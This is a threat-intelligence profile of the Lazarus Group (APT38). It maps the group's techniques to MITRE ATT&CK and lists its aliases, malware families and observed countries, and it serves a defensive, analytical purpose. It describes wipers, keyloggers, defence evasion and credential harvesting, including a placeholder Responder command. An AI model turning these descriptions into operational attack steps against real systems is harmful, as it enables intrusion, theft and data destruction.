Campaigns
From Lazarus''No Pineapple''

From Lazarus''No Pineapple''

ZincHidden CobraLazarusPineappleAPT38
The North Korean hacker group Lazarus APT 38 ,has been active since 2009. They were a group of criminals with an indeterminate number of criminals. However, due to their intended nature, methods, and threats on the web, they were classified as an Advanced Persistent Threat. The cybersecurity community gathers these under other names such as Zinc and Hidden Cobra.

Indicators of Compromise

No domains found for this campaign

APT Groups1

Lazarus GroupKorea, Democratic People's Republic of
Labyrinth ChollimaHidden CobraDiamond SleetGroup 77Whois Hacking TeamAPT-C-26NewRomanic Cyber Army TeamUNC2970UNC577TraderTraitorTA404SectorA01ATK 3Gods DisciplesApplewormGuardians of PeaceUNC4736DEV-0139ITG03Lazarus GroupUNC4034Jade SleetZincHastati GroupUNC4899Gods Apostles

Campaign Guidance

Remediation, mitigation, notes, history and related intelligence

NameDescription
Labyrinth Chollima

[4]

HIDDEN COBRA

The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA.[1][5]

Guardians of Peace

[1]

ZINC

[6]

NICKEL ACADEMY

[7]

DomainIDNameUse
EnterpriseT1134.002Access Token ManipulationCreate Process with Token

Lazarus Group keylogger KiloAlfa obtains user tokens from interactive sessions to execute itself with API call CreateProcessAsUserA under that user's context.[3][8]

EnterpriseT1087.002Account DiscoveryDomain Account

Lazarus Group has queried an active directory server to obtain the list of accounts, including administrator accounts.[9]

EnterpriseT1098Account Manipulation

Lazarus Group malware WhiskeyDelta-Two contains a function that attempts to rename the administrator’s account.[3][10]

EnterpriseT1583.001Acquire InfrastructureDomains

Lazarus Group has acquired domains related to their campaigns to act as distribution points and C2 channels.[11][9][12]

.004Acquire InfrastructureServer

Lazarus Group has acquired servers to host their malicious tools.[9]

.006Acquire InfrastructureWeb Services

Lazarus Group has hosted malicious downloads on Github and Dropbox.[11][13]

EnterpriseT1557.001Adversary-in-the-MiddleLLMNR/NBT-NS Poisoning and SMB Relay

Lazarus Group executed Responder using the command [Responder file path] -i [IP address] -rPv on a compromised host to harvest credentials and move laterally.[14]

EnterpriseT1071.001Application Layer ProtocolWeb Protocols

Lazarus Group has conducted C2 over HTTP and HTTPS.[15][16][17][18][19][20][21]

EnterpriseT1010Application Window Discovery

Lazarus Group malware IndiaIndia obtains and sends to its C2 server the title of the window for each running process. The KilaAlfa keylogger also reports the title of the window in the foreground.[3][22][8]

EnterpriseT1560Archive Collected Data

Lazarus Group has compressed exfiltrated data with RAR and used RomeoDelta malware to archive specified directories in .zip format, encrypt the .zip file, and upload it to C2. [22][23][15][9]

.002Archive via Library

Lazarus Group malware IndiaIndia saves information gathered about the victim to a file that is compressed with Zlib, encrypted, and uploaded to a C2 server.[23][15]

.003Archive via Custom Method

Lazarus Group malware sample encrypts data using a simple byte based XOR operation prior to exfiltration.[3][22][23][15]

EnterpriseT1547.001Boot or Logon Autostart ExecutionRegistry Run Keys / Startup Folder

Lazarus Group has maintained persistence by loading malicious code into a startup folder or by adding a Registry Run key.[3][23][15][18][19]

.009Boot or Logon Autostart ExecutionShortcut Modification

Lazarus Group malware has maintained persistence on a system by creating a LNK shortcut in the user’s Startup folder.[15][13]

EnterpriseT1110Brute Force

Lazarus Group has performed brute force attacks against administrator accounts.[9]

.003Password Spraying

Lazarus Group malware attempts to connect to Windows shares for lateral movement by using a generated list of usernames, which center around permutations of the username Administrator, and weak passwords.[3][23]

EnterpriseT1059.001Command and Scripting InterpreterPowerShell

Lazarus Group has used PowerShell to execute commands and malicious code.[9][12]

.003Command and Scripting InterpreterWindows Command Shell

Lazarus Group malware uses cmd.exe to execute commands on a compromised host.[3][10][15][24][20] A Destover-like variant used by Lazarus Group uses a batch file mechanism to delete its binaries from the system.[25]

.005Command and Scripting InterpreterVisual Basic

Lazarus Group has used VBA and embedded macros in Word documents to execute malicious code.[18][13][19][20]

EnterpriseT1584.001Compromise InfrastructureDomains

Lazarus Group has compromised legitimate domains, including those hosted in the US and Italy, for C2.[26]

.004Compromise InfrastructureServer

Lazarus Group has compromised servers to stage malicious tools.[14][13][9][18]

EnterpriseT1543.003Create or Modify System ProcessWindows Service

Several Lazarus Group malware families install themselves as new services.[3][10]

EnterpriseT1485Data Destruction

Lazarus Group has used a custom secure delete function to overwrite file contents with data from heap memory.[3]

EnterpriseT1132.001Data EncodingStandard Encoding

Lazarus Group malware sample encodes data with base64.[15]

EnterpriseT1005Data from Local System

Lazarus Group has collected data and files from compromised networks.[3][22][23][14][13][18]

EnterpriseT1001.003Data ObfuscationProtocol Impersonation

Lazarus Group malware also uses a unique form of communication encryption known as FakeTLS that mimics TLS but uses a different encryption method, potentially evading SSL traffic inspection/decryption.[3][10][15][25]

EnterpriseT1074.001Data StagedLocal Data Staging

Lazarus Group malware IndiaIndia saves information gathered about the victim to a file that is saved in the %TEMP% directory, then compressed, encrypted, and uploaded to a C2 server.[3][22]

EnterpriseT1491.001DefacementInternal Defacement

Lazarus Group replaced the background wallpaper of systems with a threatening image after rendering the system unbootable with a Disk Structure Wipe.[10]

EnterpriseT1140Deobfuscate/Decode Files or Information

Lazarus Group has used shellcode within macros to decrypt and manually map DLLs and shellcode into memory at runtime.[19][20]

EnterpriseT1587.001Develop CapabilitiesMalware

Lazarus Group has developed custom malware for use in their operations.[11][9][12][13]

EnterpriseT1561.001Disk WipeDisk Content Wipe

Lazarus Group has used malware like WhiskeyAlfa to overwrite the first 64MB of every drive with a mix of static and random buffers. A similar process is then used to wipe content in logical drives and, finally, attempt to wipe every byte of every sector on every drive. WhiskeyBravo can be used to overwrite the first 4.9MB of physical drives. WhiskeyDelta can overwrite the first 132MB or 1.5MB of each drive with random data from heap memory.[10]

.002Disk WipeDisk Structure Wipe

Lazarus Group malware SHARPKNOT overwrites and deletes the Master Boot Record (MBR) on the victim's machine and has possessed MBR wiper malware since at least 2009.[24][3]

EnterpriseT1189Drive-by Compromise

Lazarus Group delivered RATANKBA and other malicious code to victims via a compromised legitimate website.[27][12]

EnterpriseT1573.001Encrypted ChannelSymmetric Cryptography

Several Lazarus Group malware families encrypt C2 traffic using custom code that uses XOR with an ADD operation and XOR with a SUB operation. Another Lazarus Group malware sample XORs C2 traffic. Other Lazarus Group malware uses Caracachs encryption to encrypt C2 payloads. Lazarus Group has also used AES to encrypt C2 traffic.[3][10][15][25][18]

EnterpriseT1585.001Establish AccountsSocial Media Accounts

Lazarus Group has created new LinkedIn and Twitter accounts to conduct social engineering against potential victims.[13][9][12]

.002Establish AccountsEmail Accounts

Lazarus Group has created new email accounts for spearphishing operations.[9][14]

EnterpriseT1048.003Exfiltration Over Alternative ProtocolExfiltration Over Unencrypted Non-C2 Protocol

Lazarus Group malware SierraBravo-Two generates an email message via SMTP containing information about newly infected victims.[3][23]

EnterpriseT1041Exfiltration Over C2 Channel

Lazarus Group has exfiltrated data and files over a C2 channel through its various tools and malware.[3][22][15][26]

EnterpriseT1567.002Exfiltration Over Web ServiceExfiltration to Cloud Storage

Lazarus Group has exfiltrated stolen data to Dropbox using a customized version of dbxcli.[9][13]

EnterpriseT1203Exploitation for Client Execution

Lazarus Group has exploited Adobe Flash vulnerability CVE-2018-4878 for execution.[28]

EnterpriseT1008Fallback Channels

Lazarus Group malware SierraAlfa sends data to one of the hard-coded C2 servers chosen at random, and if the transmission fails, chooses a new C2 server to attempt the transmission again.[3][23]

EnterpriseT1083File and Directory Discovery

Several Lazarus Group has conducted word searches on compromised machines to identify specific documents of interest. Lazarus Group malware can use a common function to identify target files by their extension, and some also enumerate files and directories, including a Destover-like variant that lists files and gathers information for all drives.[3][25][13][19][20]

EnterpriseT1589.002Gather Victim Identity InformationEmail Addresses

Lazarus Group collected email addresses belonging to various departments of a targeted organization which were used in follow-on phishing campaigns.[14]

EnterpriseT1591Gather Victim Org Information

Lazarus Group has studied publicly available information about a targeted organization to tailor spearphishing efforts against specific departments and/or individuals.[9][13][14]

.004Identify Roles

Lazarus Group has targeted specific individuals within an organization with tailored job vacancy announcements.[9][13]

EnterpriseT1564.001Hide ArtifactsHidden Files and Directories

Lazarus Group has used a VBA Macro to set its file attributes to System and Hidden and has named files with a dot prefix to hide them from the Finder application.[15][16][17][19]

EnterpriseT1574.002Hijack Execution FlowDLL Side-Loading

Lazarus Group has replaced win_fw.dll, an internal component that is executed during IDA Pro installation, with a malicious DLL to download and execute a payload.[21]

.013Hijack Execution FlowKernelCallbackTable

Lazarus Group has abused the KernelCallbackTable to hijack process control flow and execute shellcode.[19][20]

EnterpriseT1562.001Impair DefensesDisable or Modify Tools

Lazarus Group malware TangoDelta attempts to terminate various processes associated with McAfee. Additionally, Lazarus Group malware SHARPKNOT disables the Microsoft Windows System Event Notification and Alerter services.[3][22][8][24].

.004Impair DefensesDisable or Modify System Firewall

Various Lazarus Group malware modifies the Windows firewall to allow incoming connections or disable it entirely using netsh[3][22][8]

EnterpriseT1070Indicator Removal

Lazarus Group has restored malicious KernelCallbackTable code to its original state after the process execution flow has been hijacked.[19]

.003Clear Command History

Lazarus Group has routinely deleted log files on a compromised router, including automatic log deletion through the use of the logrotate utility.[14]

.004File Deletion

Lazarus Group malware has deleted files in various ways, including "suicide scripts" to delete malware binaries from the victim. Lazarus Group also uses secure file deletion to delete files from the victim.[3][25]

.006Timestomp

Several Lazarus Group malware families use timestomping, including modifying the last write timestamp of a specified Registry key to a random date, as well as copying the timestamp for legitimate .exe files (such as calc.exe or mspaint.exe) to its dropped files.[3][10][22][25]

EnterpriseT1202Indirect Command Execution

Lazarus Group persistence mechanisms have used forfiles.exe to execute .htm files.[20]

EnterpriseT1105Ingress Tool Transfer

Lazarus Group has downloaded files, malware, and tools from its C2 onto a compromised host.[3][10][22][16][17][13][14][18][9][12][19][20][21]

EnterpriseT1056.001Input CaptureKeylogging

Lazarus Group malware KiloAlfa contains keylogging functionality.[3][8]

EnterpriseT1534Internal Spearphishing

Lazarus Group has conducted internal spearphishing from within a compromised organization.[13]

EnterpriseT1036Masquerading

Lazarus Group has disguised malicious template files as JPEG files to avoid detection.[18]

.003Rename System Utilities

Lazarus Group has renamed system utilities such as wscript.exe and mshta.exe.[20]

.004Masquerade Task or Service

Lazarus Group has used a scheduled task named SRCheck to mask the execution of a malicious .dll.[21]

.005Match Legitimate Name or Location

Lazarus Group has renamed malicious code to disguise it as Microsoft's narrator and other legitimate files.[29][9][20]

EnterpriseT1104Multi-Stage Channels

Lazarus Group has used multi-stage malware components that inject later stages into separate processes.[19]

EnterpriseT1106Native API

Lazarus Group has used the Windows API ObtainUserAgentString to obtain the User-Agent from a compromised host to connect to a C2 server.[18] Lazarus Group has also used various, often lesser known, functions to perform various types of Discovery and Process Injection.[19][20]

EnterpriseT1046Network Service Discovery

Lazarus Group has used nmap from a router VM to scan ports on systems within the restricted segment of an enterprise network.[14]

EnterpriseT1571Non-Standard Port

Some Lazarus Group malware uses a list of ordered port numbers to choose a port for C2 traffic, creating port-protocol mismatches.[3][23]

EnterpriseT1027Obfuscated Files or Information

Lazarus Group has used multiple types of encryption and encoding for their payloads, including AES, Caracachs, RC4, XOR, Base64, and other tricks such as creating aliases in code for Native API function names.[3][22][23][15][17][9][18][26][13][19][20]

.002Software Packing

Lazarus Group has used Themida to pack malicious DLLs and other files.[13][26]

.007Dynamic API Resolution

Lazarus Group has used a custom hashing method to resolve APIs used in shellcode.[19]

EnterpriseT1588.002Obtain CapabilitiesTool

Lazarus Group has obtained a variety of tools for their operations, including Responder, PuTTy PSCP, Wake-On-Lan, ChromePass, and dbxcli.[9][13][14]

.003Obtain CapabilitiesCode Signing Certificates

Lazarus Group has used code signing certificates issued by Sectigo RSA for some of its malware and tools.[9]

.004Obtain CapabilitiesDigital Certificates

Lazarus Group has obtained SSL certificates for their C2 domains.[11]

EnterpriseT1566.001PhishingSpearphishing Attachment

Lazarus Group has targeted victims with spearphishing emails containing malicious Microsoft Word documents.[28][14][18][19][20]

.002PhishingSpearphishing Link

Lazarus Group has sent malicious links to victims via email.[14][13][9]

.003PhishingSpearphishing via Service

Lazarus Group has used social media platforms, including LinkedIn and Twitter, to send spearphishing messages.[12][13][9]

EnterpriseT1542.003Pre-OS BootBootkit

Lazarus Group malware WhiskeyAlfa-Three modifies sector 0 of the Master Boot Record (MBR) to ensure that the malware will persist even if a victim machine shuts down.[3][10]

EnterpriseT1057Process Discovery

Several Lazarus Group malware families gather a list of running processes on a victim system and send it to their C2 server. A Destover-like variant used by Lazarus Group also gathers process times.[3][22][15][25][17][19]

EnterpriseT1055.001Process InjectionDynamic-link Library Injection

Lazarus Group malware sample performs reflective DLL injection.[15][19]

EnterpriseT1090.001ProxyInternal Proxy

Lazarus Group has used a compromised router to serve as a proxy between a victim network's corporate and restricted segments.[14]

.002ProxyExternal Proxy

Lazarus Group has used multiple proxies to obfuscate network traffic from victims.[30][17]

EnterpriseT1012Query Registry

Lazarus Group malware IndiaIndia checks Registry keys within HKCU and HKLM to determine if certain applications are present, including SecureCRT, Terminal Services, RealVNC, TightVNC, UltraVNC, Radmin, mRemote, TeamViewer, FileZilla, pcAnyware, and Remote Desktop. Another Lazarus Group malware sample checks for the presence of the following Registry key:HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt.[3][22][15]

EnterpriseT1620Reflective Code Loading

Lazarus Group has changed memory protection permissions then overwritten in memory DLL function code with shellcode, which was later executed via KernelCallbackTable hijacking. Lazarus Group has also used shellcode within macros to decrypt and manually map DLLs into memory at runtime.[19][20]

EnterpriseT1021.001Remote ServicesRemote Desktop Protocol

Lazarus Group malware SierraCharlie uses RDP for propagation.[3][23]

.002Remote ServicesSMB/Windows Admin Shares

Lazarus Group malware SierraAlfa accesses the ADMIN$ share via SMB to conduct lateral movement.[3][23]

.004Remote ServicesSSH

Lazarus Group used SSH and the PuTTy PSCP utility to gain access to a restricted segment of a compromised network.[14]

EnterpriseT1053.005Scheduled Task/JobScheduled Task

Lazarus Group has used schtasks for persistence including through the periodic execution of a remote XSL script or a dropped VBS payload.[9][20][21]

EnterpriseT1593.001Search Open Websites/DomainsSocial Media

Lazarus Group has used LinkedIn to identify and target specific employees within a chosen organization.[9][13]

EnterpriseT1489Service Stop

Lazarus Group has stopped the MSExchangeIS service to render Exchange contents inaccessible to users.[10]

EnterpriseT1608.001Stage CapabilitiesUpload Malware

Lazarus Group has hosted malicious files on compromised as well as Lazarus Group-controlled servers.[13][9][26]

.002Stage CapabilitiesUpload Tool

Lazarus Group has hosted custom and open-source tools on compromised as well as Lazarus Group-controlled servers.[9]

EnterpriseT1553.002Subvert Trust ControlsCode Signing

Lazarus Group has digitally signed malware and utilities to evade detection.[9][19]

EnterpriseT1218System Binary Proxy Execution

Lazarus Group lnk files used for persistence have abused the Windows Update Client (wuauclt.exe) to execute a malicious DLL.[19][20]

.005Mshta

Lazarus Group has used mshta.exe to execute HTML pages downloaded by initial access documents.[19][20]

.010Regsvr32

Lazarus Group has used rgsvr32 to execute custom malware.[9]

.011Rundll32

Lazarus Group has used rundll32 to execute malicious payloads on a compromised host.[18][9][21]

EnterpriseT1082System Information Discovery

Several Lazarus Group malware families collect information on the type and version of the victim OS, as well as the victim computer name and CPU information. A Destover-like variant used by Lazarus Group also collects disk space information and sends it to its C2 server.[3][10][22][15][25][19]

EnterpriseT1614.001System Location DiscoverySystem Language Discovery

Lazarus Group has deployed malware designed not to run on computers set to Korean, Japanese, or Chinese in Windows language preferences.[13]

EnterpriseT1016System Network Configuration Discovery

Lazarus Group malware IndiaIndia obtains and sends to its C2 server information about the first network interface card’s configuration, including IP address, gateways, subnet mask, DHCP information, and whether WINS is available.[3][22]

EnterpriseT1049System Network Connections Discovery

Lazarus Group has used net use to identify and establish a network connection with a remote host.[14]

EnterpriseT1033System Owner/User Discovery

Various Lazarus Group malware enumerates logged-on users.[3][10][22][23][15][16][19]

EnterpriseT1529System Shutdown/Reboot

Lazarus Group has rebooted systems after destroying files and wiping the MBR on infected systems.[24]

EnterpriseT1124System Time Discovery

A Destover-like implant used by Lazarus Group can obtain the current system time and send it to the C2 server.[25]

EnterpriseT1221Template Injection

Lazarus Group has used DOCX files to retrieve a malicious document template/DOTM file.[13][18]

EnterpriseT1204.001User ExecutionMalicious Link

Lazarus Group has sent spearphishing emails in an attempt to lure users to click on a malicious link.[9][13]

.002User ExecutionMalicious File

Lazarus Group has attempted to get users to launch a malicious Microsoft Word attachment delivered via a spearphishing email.[28][13][14][19][20]

EnterpriseT1078Valid Accounts

Lazarus Group has used administrator credentials to gain access to restricted network segments.[14]

EnterpriseT1497.001Virtualization/Sandbox EvasionSystem Checks

Lazarus Group has used tools to detect sandbox or VMware services through identifying the presence of a debugger or related services.[13]

EnterpriseT1102.002Web ServiceBidirectional Communication

Lazarus Group has used GitHub as C2, pulling hosted image payloads then committing command execution output to files in specific directories.[19]

EnterpriseT1047Windows Management Instrumentation

Lazarus Group has used WMIC for discovery as well as to execute payloads for persistence and lateral movement.[3][23][13][14][20]

EnterpriseT1220XSL Script Processing

Lazarus Group has used WMIC to execute a remote XSL script to establish persistence.[9]

ICST0865Spearphishing Attachment

Lazarus Group has been observed targeting organizations using spearphishing documents with embedded malicious payloads. [31] Highly targeted spear phishing campaigns have been conducted against a U.S. electric grid company. [32]

IDNameReferencesTechniques
S0584AppleJeus[11]Abuse Elevation Control MechanismBypass User Account ControlApplication Layer ProtocolWeb ProtocolsCommand and Scripting InterpreterUnix ShellCreate or Modify System ProcessWindows ServiceCreate or Modify System ProcessLaunch DaemonDeobfuscate/Decode Files or InformationEvent Triggered ExecutionInstaller PackagesExfiltration Over C2 ChannelHide ArtifactsHidden Files and DirectoriesIndicator RemovalFile DeletionObfuscated Files or InformationPhishingSpearphishing LinkScheduled Task/JobScheduled TaskSubvert Trust ControlsCode SigningSystem Binary Proxy ExecutionMsiexecSystem Information DiscoverySystem ServicesLaunchctlUser ExecutionMalicious LinkUser ExecutionMalicious FileVirtualization/Sandbox EvasionTime Based Evasion
S0347AuditCred[33]Command and Scripting InterpreterWindows Command ShellCreate or Modify System ProcessWindows ServiceDeobfuscate/Decode Files or InformationFile and Directory DiscoveryIndicator RemovalFile DeletionIngress Tool TransferObfuscated Files or InformationProcess InjectionProxy
S0245BADCALL[34]Data ObfuscationProtocol ImpersonationEncrypted ChannelSymmetric CryptographyImpair DefensesDisable or Modify System FirewallModify RegistryNon-Standard PortProxySystem Information DiscoverySystem Network Configuration Discovery
S0239Bankshot[28]Access Token ManipulationCreate Process with TokenAccount DiscoveryLocal AccountAccount DiscoveryDomain AccountApplication Layer ProtocolWeb ProtocolsAutomated CollectionCommand and Scripting InterpreterWindows Command ShellCreate or Modify System ProcessWindows ServiceData EncodingNon-Standard EncodingData from Local SystemData ObfuscationProtocol ImpersonationDeobfuscate/Decode Files or InformationExfiltration Over C2 ChannelExploitation for Client ExecutionFile and Directory DiscoveryIndicator RemovalTimestompIndicator RemovalFile DeletionIndicator RemovalIngress Tool TransferModify RegistryNative APINon-Standard PortProcess DiscoveryQuery RegistrySystem Information Discovery
S0520BLINDINGCAN[35]Application Layer ProtocolWeb ProtocolsCommand and Scripting InterpreterWindows Command ShellData EncodingStandard EncodingData from Local SystemDeobfuscate/Decode Files or InformationEncrypted ChannelSymmetric CryptographyExfiltration Over C2 ChannelFile and Directory DiscoveryIndicator RemovalFile DeletionIndicator RemovalTimestompIngress Tool TransferMasqueradingMatch Legitimate Name or LocationObfuscated Files or InformationSoftware PackingObfuscated Files or InformationPhishingSpearphishing AttachmentShared ModulesSubvert Trust ControlsCode SigningSystem Binary Proxy ExecutionRundll32System Information DiscoverySystem Network Configuration DiscoveryUser ExecutionMalicious File
S0498Cryptoistic[16]Data from Local SystemEncrypted ChannelFile and Directory DiscoveryIndicator RemovalFile DeletionIngress Tool TransferNon-Application Layer ProtocolSystem Owner/User Discovery
S0497Dacls[16][17]Application Layer ProtocolWeb ProtocolsCreate or Modify System ProcessLaunch DaemonCreate or Modify System ProcessLaunch AgentFile and Directory DiscoveryHide ArtifactsHidden Files and DirectoriesIngress Tool TransferMasqueradingObfuscated Files or InformationProcess Discovery
S0567Dtrack[36]Archive Collected DataBoot or Logon Autostart ExecutionBrowser Bookmark DiscoveryCommand and Scripting InterpreterWindows Command ShellCreate or Modify System ProcessWindows ServiceData from Local SystemData StagedLocal Data StagingDeobfuscate/Decode Files or InformationFile and Directory DiscoveryHijack Execution FlowIndicator RemovalFile DeletionIngress Tool TransferInput CaptureKeyloggingMasqueradingMatch Legitimate Name or LocationObfuscated Files or InformationEmbedded PayloadsProcess DiscoveryProcess InjectionProcess HollowingQuery RegistryShared ModulesSystem Information DiscoverySystem Network Configuration DiscoverySystem Network Connections DiscoveryValid Accounts
S0593ECCENTRICBANDWAGON[37]Command and Scripting InterpreterWindows Command ShellData StagedLocal Data StagingIndicator RemovalFile DeletionInput CaptureKeyloggingObfuscated Files or InformationScreen Capture
S0181FALLCHILL[30]Create or Modify System ProcessWindows ServiceData ObfuscationProtocol ImpersonationEncrypted ChannelSymmetric CryptographyFile and Directory DiscoveryIndicator RemovalFile DeletionIndicator RemovalTimestompSystem Information DiscoverySystem Network Configuration Discovery
S0246HARDRAIN[38]Command and Scripting InterpreterWindows Command ShellData ObfuscationProtocol ImpersonationImpair DefensesDisable or Modify System FirewallNon-Standard PortProxy
S0376HOPLIGHT[5]Command and Scripting InterpreterWindows Command ShellData EncodingStandard EncodingExfiltration Over C2 ChannelFallback ChannelsFile and Directory DiscoveryImpair DefensesDisable or Modify System FirewallIngress Tool TransferModify RegistryNon-Standard PortOS Credential DumpingSecurity Account ManagerProcess InjectionProxyQuery RegistrySystem Information DiscoverySystem ServicesService ExecutionSystem Time DiscoveryUse Alternate Authentication MaterialPass the HashWindows Management Instrumentation
S0431HotCroissant[39]Application Window DiscoveryCommand and Scripting InterpreterWindows Command ShellEncrypted ChannelSymmetric CryptographyExfiltration Over C2 ChannelFile and Directory DiscoveryHide ArtifactsHidden WindowIndicator RemovalFile DeletionIngress Tool TransferNative APIObfuscated Files or InformationObfuscated Files or InformationSoftware PackingProcess DiscoveryScheduled Task/JobScheduled TaskScreen CaptureService StopSoftware DiscoverySystem Information DiscoverySystem Network Configuration DiscoverySystem Owner/User DiscoverySystem Service Discovery
S0271KEYMARBLE[40]Command and Scripting InterpreterWindows Command ShellEncrypted ChannelSymmetric CryptographyFile and Directory DiscoveryIndicator RemovalFile DeletionIngress Tool TransferModify RegistryProcess DiscoveryScreen CaptureSystem Information DiscoverySystem Network Configuration Discovery
S0108netsh[22]Event Triggered ExecutionNetsh Helper DLLImpair DefensesDisable or Modify System FirewallProxySoftware DiscoverySecurity Software Discovery
S0238Proxysvc[25]Application Layer ProtocolWeb ProtocolsAutomated CollectionCommand and Scripting InterpreterWindows Command ShellData DestructionData from Local SystemExfiltration Over C2 ChannelFile and Directory DiscoveryIndicator RemovalFile DeletionProcess DiscoveryQuery RegistrySystem Information DiscoverySystem Network Configuration DiscoverySystem ServicesService ExecutionSystem Time Discovery
S0241RATANKBA[41]Account DiscoveryLocal AccountApplication Layer ProtocolWeb ProtocolsCommand and Scripting InterpreterPowerShellCommand and Scripting InterpreterWindows Command ShellIngress Tool TransferProcess DiscoveryProcess InjectionDynamic-link Library InjectionQuery RegistryRemote System DiscoverySystem Information DiscoverySystem Network Configuration DiscoverySystem Network Connections DiscoverySystem Owner/User DiscoverySystem Service DiscoveryWindows Management Instrumentation
S0364RawDisk[3][10]Data DestructionDisk WipeDisk Content WipeDisk WipeDisk Structure Wipe
S0174Responder[13]Adversary-in-the-MiddleLLMNR/NBT-NS Poisoning and SMB RelayNetwork Sniffing
S0103route[14]System Network Configuration Discovery
S0586TAINTEDSCRIBE[29]Archive Collected DataBoot or Logon Autostart ExecutionRegistry Run Keys / Startup FolderCommand and Scripting InterpreterWindows Command ShellData ObfuscationProtocol ImpersonationEncrypted ChannelSymmetric CryptographyFallback ChannelsFile and Directory DiscoveryIndicator RemovalFile DeletionIndicator RemovalTimestompIngress Tool TransferMasqueradingMatch Legitimate Name or LocationObfuscated Files or InformationBinary PaddingProcess DiscoveryRemote System DiscoverySystem Information DiscoverySystem Time Discovery
S0665ThreatNeedle[14]Boot or Logon Autostart ExecutionRegistry Run Keys / Startup FolderCreate or Modify System ProcessWindows ServiceData from Local SystemDeobfuscate/Decode Files or InformationFile and Directory DiscoveryIngress Tool TransferMasqueradingMatch Legitimate Name or LocationModify RegistryObfuscated Files or InformationPhishingSpearphishing AttachmentSystem Information DiscoveryUser ExecutionMalicious File
S0678Torisma[26]Application Layer ProtocolWeb ProtocolsData EncodingStandard EncodingDeobfuscate/Decode Files or InformationEncrypted ChannelSymmetric CryptographyExecution GuardrailsExfiltration Over C2 ChannelNative APIObfuscated Files or InformationSoftware PackingObfuscated Files or InformationSystem Information DiscoverySystem Network Configuration DiscoverySystem Network Connections DiscoverySystem Time Discovery
S0263TYPEFRAME[42]Command and Scripting InterpreterVisual BasicCommand and Scripting InterpreterWindows Command ShellCreate or Modify System ProcessWindows ServiceDeobfuscate/Decode Files or InformationFile and Directory DiscoveryImpair DefensesDisable or Modify System FirewallIndicator RemovalFile DeletionIngress Tool TransferModify RegistryNon-Standard PortObfuscated Files or InformationProxySystem Information DiscoveryUser ExecutionMalicious File
S0180Volgmer[43]Command and Scripting InterpreterWindows Command ShellCreate or Modify System ProcessWindows ServiceDeobfuscate/Decode Files or InformationEncrypted ChannelSymmetric CryptographyEncrypted ChannelAsymmetric CryptographyFile and Directory DiscoveryIndicator RemovalFile DeletionIngress Tool TransferMasqueradingMasquerade Task or ServiceModify RegistryNative APIObfuscated Files or InformationProcess DiscoveryQuery RegistrySystem Information DiscoverySystem Network Configuration DiscoverySystem Network Connections DiscoverySystem Service Discovery
S0366WannaCry[44][45][46][47]Create or Modify System ProcessWindows ServiceData Encrypted for ImpactEncrypted ChannelAsymmetric CryptographyExploitation of Remote ServicesExploitation of Remote ServicesFile and Directory DiscoveryFile and Directory Permissions ModificationWindows File and Directory Permissions ModificationHide ArtifactsHidden Files and DirectoriesInhibit System RecoveryLateral Tool TransferLateral Tool TransferPeripheral Device DiscoveryProxyMulti-hop ProxyRemote Service Session HijackingRDP HijackingRemote System DiscoveryService StopSystem Network Configuration DiscoveryWindows Management Instrumentation

Reports & References2

Observed Countries11

AR (817)
BG (787)
BR (340)
ES (887)
IN (236)
JP (48)
KP (970)
MX (53)
PH (834)
SG (672)
TR (447)